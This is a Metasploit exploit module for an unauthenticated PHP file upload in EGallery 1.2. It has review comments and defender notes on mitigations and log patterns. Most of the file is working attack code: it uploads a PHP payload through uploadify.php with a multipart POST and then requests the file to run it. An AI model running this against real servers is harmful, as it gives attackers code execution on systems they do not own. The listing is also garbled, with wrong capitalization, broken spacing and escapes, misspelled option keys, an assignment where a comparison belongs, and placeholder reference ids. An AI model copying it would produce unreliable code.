##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
Require 'msf/core'
Class Metasploit3 <Msf: Exploit: Remote
Rank = ExcellentRanking
Include Msf: Exploit: Remote: HttpClient
# Module metadata and options. Everything in here is declarative: the
# update_info hash names the affected product, references, payload
# constraints and the single target; register_options adds the TARGETURI
# option the check and exploit methods read.
# NOTE(review): this listing is case- and whitespace-mangled (e.g. 'Url',
# 'Ossvdb', 'Defaultopexception', 'Exitfunction'); the key spellings must
# match the names the framework expects before the module will load — confirm
# against the original source.
Def initialize (info = {})
Super (update_info (info,
'Name' => "EGallery PHP File Upload Vulnerability ",
# Author's summary: EGallery 1.2 ships an uploadify.php handler that accepts
# file uploads into egallery/ with no authentication.
'Description' => % q {
This module exploits a vulnerability found in EGallery 1.2 By abusing
Uploadify. php file, a malicious user can upload a file to the egallery/directory
Without any authentication, which results in arbitrary code execution. The module
Has been tested successfully on Ubuntu 10.04.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Sammy FORGIT ', # Discovery, PoC
'Juanc' # Metasploit module
],
# NOTE(review): both numeric reference ids are '123', which looks like a
# placeholder rather than real OSVDB/BID entries — verify before relying on
# them for tracking or correlation.
'References '=>
[
['Ossvdb', '123'],
['Bid', '123'],
['Url', 'HTTP: // www. opensyscom. fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html ']
],
# PHP payload; a NUL byte is excluded from the encoded output.
'Payload' =>
{
'Badchars' => "\ x00"
},
'Defaultopexception' =>
{
'Exitfunction' => "none"
},
'Platform' => ['php'],
'Arch '=> ARCH_PHP,
# Single target with no target-specific settings.
'Targets' =>
[
['Egallery 1.2 ', {}]
],
'Privileged' => false,
'Disclosuredate' => "Jul 08 2012 ",
'Defaulttarget' => 0 ))
# TARGETURI: base path of the EGallery install (default '/sample'); the
# egallery/uploadify.php handler is resolved relative to it.
Register_options (
[
OptString. new ('targeturi ', [true, 'the base path to EGallery', '/sample'])
], Self. class)
End
# Fingerprint only: fetch <TARGETURI>/egallery/uploadify.php and report
# Detected when the server answers 200 with an empty body, Safe otherwise.
# An empty 200 shows the upload handler is reachable, not that it accepts
# unauthenticated uploads, which is why the result is Detected rather than
# Vulnerable. For defenders, this GET is the module's first observable
# request and a reasonable thing to alert on.
Def check
# Normalize the base path so the egallery/ suffix can be appended.
Uri = target_uri.path
Uri <'/' if uri [-1, 1]! = '/'
Res = send_request_cgi ({
'Method' => 'get ',
'Url' => "# {uri} egallery/uploadify. php"
})
# NOTE(review): `res. code = 200` reads as an assignment in this mangled
# listing; the condition is clearly meant as an equality test — confirm
# against the original source.
If res and res. code = 200 and res. body. empty?
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End
End
# Upload a PHP file through uploadify.php, then request it so the web server
# runs the payload. Two HTTP requests are made: a multipart POST to
# <TARGETURI>/egallery/uploadify.php and a GET of the uploaded file under
# TARGETURI. From a defender's view the handler takes the upload with no
# authentication and writes a .php file with a client-chosen name into a
# web-served directory; requiring authentication on the handler, rejecting
# executable extensions and storing uploads outside the docroot each break
# this chain, and the POST-then-GET pair is the pattern to look for in logs.
Def exploit
# Normalize the base path so paths can be appended to it.
Uri = target_uri.path
Uri <'/' if uri [-1, 1]! = '/'
Peer = "# {rhost }:# {rport }"
# Random alphabetic name of 5-14 characters with a .php extension.
Payload_name = rand_text_alpha (rand (10) + 5) + '. php'
Boundary = Rex: Text. rand_text_hex (7)
# Hand-built multipart/form-data body with three parts: Filename, folder
# (presumably the destination directory; set to the base path here) and
# Filedata, the file itself, with the encoded payload wrapped in PHP tags.
Post_data = "-- # {boundary} \ r \ n"
Post_data <"Content-Disposition: form-data; name = \" Filename \ "\ r \ n"
Post_data <"# {payload_name} \ r \ n"
Post_data <"-- # {boundary} \ r \ n"
Post_data <"Content-Disposition: form-data; name = \" folder \ "\ r \ n"
Post_data <"# {uri} \ r \ n"
Post_data <"-- # {boundary} \ r \ n"
Post_data <"Content-Disposition: form-data; name = \" Filedata \ "; filename = \" # {payload_name} \ "\ r \ n"
Post_data <"<? Php"
Post_data <payload. encoded
Post_data <"?> \ R \ n"
Post_data <"-- # {boundary} -- \ r \ n"
Print_status ("# {peer}-Sending PHP payload (# {payload_name })")
# Upload request; the Content-Type carries the same boundary used above.
Res = send_request_cgi ({
'Method' => 'post ',
'Url' => "# {uri} egallery/uploadify. php ",
'Ctype '=> "multipart/form-data; boundary =#{ boundary }",
'Data' => post_data
})
# The upload counts as successful only when the server returns 200 and the
# response body echoes the chosen file name; anything else aborts here.
If not res or res. code! = 200 or res. body !~ /# {Payload_name }/
Print_error ("# {peer}-File wasn't uploaded, aborting! ")
Return
End
Print_status ("# {peer}-Executing PHP payload (# {payload_name })")
# Request the uploaded file; serving it is what runs the PHP payload.
Res = send_request_cgi ({
'Method' => 'get ',
'Url' => "# {uri} # {payload_name }"
})
# A non-200 here suggests the file is not being served (or not executed), so
# the status code is printed for debugging. A missing response is ignored.
If res and res. code! = 200
Print_status ("# {peer}-Server returned # {res. code. to_s }")
End
End
End